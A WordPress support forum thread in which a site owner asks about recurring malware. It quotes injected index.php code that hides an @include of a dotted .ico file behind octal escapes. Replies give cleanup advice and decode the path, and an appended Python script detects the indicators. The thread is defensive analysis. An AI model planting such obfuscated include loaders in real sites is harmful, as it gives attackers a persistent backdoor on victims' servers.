• Good day, I have this recurring mess that no one seems to know what it is and all malware / antivirus for WordPress fail to block.

    Situation.
    I had hosting with InMotion and there the “infection” started; finally, after they could not resolve it, I presume it was cross-site contamination and moved to FastComet hosting.

    Long story short.

    There are files in several domains I have that come back to life after I have extensively cleaned them; I literally deleted 90% of the domains' websites and uploaded clean March 2019 copies.
    The only exception was cPanel, which was migrated, and FastComet used their Ninja and all other virus and malware cleaners to fix anything possible.

    In index.php this garbage appears.

    <?php
    /*01e78*/

    @include "\057ho\155e/\150cm\162eu\065/b\154an\143va\056co\155/w\160-a\144mi\156/i\155ag\145s/\05683\1425c\14270\056ic\157";

    /*01e78*/

    Then somehow these numbered files appear, yes even this below in empty directories:
    .066551a6.ico
    .10dac2e5.ico
    4uvayita.php
    bjsconzw.php
    index.php
    pivyomcw.php
    etc…

    Does anyone know what this is and how to fix it, not paying some scam malware companies that all fail, 100% failure to fix this. Some detect and remove.

    Latest WordPress 5.2.2.3
    WP Security, Ninja, and 30 others, individually or combined, all active, and none of them can stop this from returning and infecting the root hosting folder and several domains.

    Any advice on how to fix this that actually works, short of deleting the complete cPanel, and even then it might return.

    Thanks for the help.

    • This topic was modified 5 years, 6 months ago by madrocker13.
Viewing 4 replies - 1 through 4 (of 4 total)
  • I’d export my media and content via the tools menu under the dashboard…

    I’d then grab a new server account where ever I felt comfortable with.

    Install a pristine WordPress from their one button or manually if I didn’t like their one button (though I like both Turnkey and Bitnami, they are not quite the same as a normal cPanel one button install).

    Bring the new, empty site up and install iThemes Security, WordFence, WordFence Assistant, and Sucuri plugins. Enable the WordFence and iThemes right now, then install the Import plugin and import all your WXR files including the media. If the files are too big for your new host you can use an ‘XML chunker/splitter’ on them.

    Run the ‘upgrade’ page just to make sure all is good. Install your previous theme… from a new copy if you can!

    Swap your DNS around for the new sites location if you haven’t done so already. Login as admin again and make sure WordFence and iThemes Security are configured well and running. Fire up Sucuri and let it run for a while.

    Sucuri will traverse your site and warn you if it finds anything. WordFence will lock out many of the problematic hacker/users. iThemes will settle in and work well with WordFence. You can disable Sucuri once you have finished configuring and testing the site. That should have exposed any viruses or malware by then. iThemes will do a good job and if you leave the Sucuri plugin disabled but installed you can run it at will when you think something is up.

    Look into https://www.ads-software.com/support/article/hardening-wordpress/ next and passwords need to be very tough.

    Pay some attention to any users you brought in during the Import process and consider a new admin account, taking all but the subscriber privileges away from your old admin user who is probably user #1 also. That right there and your WordFence will foil a lot of the script kiddies.

    Don’t publish your posts using the new admin account either. Use a contributor or editor account instead.

    One final step would be to put your site on Cloudflare also… You’ll get one of the best DNS services in the business and your actual ‘origin’ server will be behind a proxy effectively firewalling that off from the greater internet once CloudFlare takes over.

    And the WordFence Assistant? It’s just going to sit there unless you need it really badly because your admin account's IP address is blocked. Once you get back in you’ll use the assistant to unblock your admin account and fix things. Then you’ll disable it again. Let it sleep… it will have earned its keep by the first time you need it.

    • This reply was modified 5 years, 6 months ago by JNashHawkins.
    Thread Starter madrocker13

    (@madrocker13)

    Thank you.
    Only thing I did not do from your list was CloudFlare.
    Users using an alternative nickname to post.

    Active and properly configured to almost extreme levels including scans local and remote.

    All In One WP Security
    Anti-Malware Security and Brute-Force Firewall
    Quttera Web Malware Scanner
    Sucuri Security – Auditing, Malware Scanner and Hardening
    WP Content Copy Protection & No Right Click, Ninja and all the other plugins, a total of 30 plugins.

    Will report back.

    The include line decodes to:
    "/home/hcmreu5/blancva.com/wp-admin/images/.83b5cb70.ico";
    and it seems like the file is still there.
    The encoding is normal text with some characters replaced by their octal equivalents. You can decode the file here:
    https://malwaredecoder.com/

    I have found similar malware on my own server. You should also look for files with the name index.html.bak.bak which has been replaced by index.php that echoes the .bak file and includes a .ico file.
    <?php
    /*aaa83*/

    @include "\057var\057www\057htm\154/ty\144nin\147er/\145n-s\166aer\055foe\144sel\057.8f\063402\0659.i\143o";

    /*aaa83*/
    echo @file_get_contents('index.html.bak.bak');

    To find possible index.php candidates, search for index.php files that are not executable.
    The .php and .ico files all seem to have 8 characters as the base name with .ico having a leading . to make it invisible for normal ls.

    The .ico file contains code that I haven’t been able to decode, but it is a kind of URL-encoded string that will translate to PHP code.

    If you have access to your web server logs you can look for POST requests and 8-character .php files. The index.php file is used with a POST of a variable like ?nwhtu=evgqy.

    I just found that this PHP malware scanner works quite OK.
    https://github.com/scr34m/php-malware-scanner
    I used scan -e .php -k -d /var/www/html and found most of the infected php pages.

    I found that my main index.php for my WordPress installation was infected with PHP code with loads of IP addresses. I assume these addresses are used to report back that the site is still up and ready to be infected further.
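The replies above describe three things a defender can check by hand: the octal-escaped string in the injected @include line, the 8-character random file names (with the .ico hidden behind a leading dot), and POST requests to those files or to index.php with a throw-away query variable. The script below is an added example written for this thread, not code from the thread or from any of the plugins mentioned. It decodes PHP octal escapes, walks a directory for the two file indicators, and filters web server log lines for the POST pattern. The directory tree and log lines it scans are constructed inline for the demonstration (the include string and the ?nwhtu=evgqy variable are the ones quoted in the thread); the 8-lowercase-alphanumeric name rule is a generalisation of the examples posted, so tune it if your site has legitimate files that match.

```python
import os
import re
import tempfile

# PHP double-quoted strings accept octal escapes of 1 to 3 octal digits (\N, \NN, \NNN).
OCTAL_ESCAPE = re.compile(r"\\([0-7]{1,3})")
# include / include_once with the quoted path captured; the @ error-suppressor is optional.
INCLUDE_RE = re.compile(r"@?include(?:_once)?\s*\(?\s*([\"'])(.*?)\1", re.S)
# Random 8-character base name; the optional leading dot hides a .ico from a plain ls.
RANDOM_NAME = re.compile(r"^\.?[0-9a-z]{8}\.(?:php|ico)$")
# Minimal combined-log parser: the request line and status code are all we need.
LOG_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<path>\S+) HTTP/[\d.]+" (?P<status>\d{3})')

# Constructed sample: the injected index.php quoted in the thread.
SAMPLE_INDEX_PHP = r'''<?php
/*01e78*/

@include "\057ho\155e/\150cm\162eu\065/b\154an\143va\056co\155/w\160-a\144mi\156/i\155ag\145s/\05683\1425c\14270\056ic\157";

/*01e78*/
'''

# Constructed sample log lines (RFC 5737 documentation addresses, invented timestamps).
SAMPLE_LOG = [
    '203.0.113.7 - - [10/Jul/2019:03:14:15 +0000] "POST /index.php?nwhtu=evgqy HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '203.0.113.7 - - [10/Jul/2019:03:14:16 +0000] "POST /wp-content/uploads/2019/4uvayita.php HTTP/1.1" 200 88 "-" "Mozilla/5.0"',
    '198.51.100.2 - - [10/Jul/2019:03:15:00 +0000] "GET /index.php HTTP/1.1" 200 9143 "-" "Mozilla/5.0"',
    '198.51.100.2 - - [10/Jul/2019:03:15:01 +0000] "POST /wp-login.php HTTP/1.1" 302 0 "-" "Mozilla/5.0"',
]


def decode_php_octal(s):
    """Replace every PHP octal escape with the character it encodes."""
    return OCTAL_ESCAPE.sub(lambda m: chr(int(m.group(1), 8)), s)


def obfuscated_includes(php_source):
    """Return the decoded targets of include statements whose path used octal escapes."""
    return [decode_php_octal(body)
            for _quote, body in INCLUDE_RE.findall(php_source)
            if OCTAL_ESCAPE.search(body)]


def is_random_name(filename):
    """True for names like 4uvayita.php or .066551a6.ico (8 random chars, optional leading dot)."""
    return RANDOM_NAME.match(filename) is not None


def scan_tree(root):
    """Walk a directory and return sorted (path, reason) pairs for files matching the indicators."""
    findings = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            if is_random_name(name):
                findings.append((path, "8-character random base name"))
                continue
            if name.endswith(".php"):
                try:
                    with open(path, encoding="utf-8", errors="replace") as fh:
                        source = fh.read()
                except OSError:
                    continue  # unreadable file: skip rather than abort the whole scan
                for target in obfuscated_includes(source):
                    findings.append((path, "octal-obfuscated include of " + target))
    return sorted(findings)


def suspicious_posts(log_lines):
    """Keep POST requests to random 8-character .php files or to index.php with a query string."""
    hits = []
    for line in log_lines:
        m = LOG_RE.search(line)
        if not m or m.group("method") != "POST":
            continue
        path, _sep, query = m.group("path").partition("?")
        base = os.path.basename(path)
        if is_random_name(base) or (base == "index.php" and query):
            hits.append(line)
    return hits


def build_sample_tree():
    """Create a constructed WordPress-like tree carrying the indicators from the thread."""
    root = tempfile.mkdtemp(prefix="wp-sample-")
    os.makedirs(os.path.join(root, "wp-admin", "images"))
    os.makedirs(os.path.join(root, "wp-content", "uploads", "2019"))
    files = {
        "index.php": SAMPLE_INDEX_PHP,
        "wp-config.php": "<?php\ndefine('DB_NAME', 'example');\n",  # benign, must not be flagged
        os.path.join("wp-admin", "images", ".83b5cb70.ico"): "/* placeholder, not a real payload */",
        os.path.join("wp-content", "uploads", "2019", "4uvayita.php"): "/* placeholder dropped file */",
    }
    for rel, content in files.items():
        with open(os.path.join(root, rel), "w", encoding="utf-8") as fh:
            fh.write(content)
    return root


if __name__ == "__main__":
    for path, reason in scan_tree(build_sample_tree()):
        print(f"{reason}: {path}")
    for line in suspicious_posts(SAMPLE_LOG):
        print("suspicious request:", line)
```

Run it against a real document root by calling scan_tree("/path/to/public_html") and feed suspicious_posts() the lines of your access log; a hit on a hidden .ico or a random 8-character .php is worth quarantining before you do anything else, and the decoded include target tells you which file the visible index.php is actually loading.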

  • The topic ‘Malware in .php and numbered .php files ?’ is closed to new replies.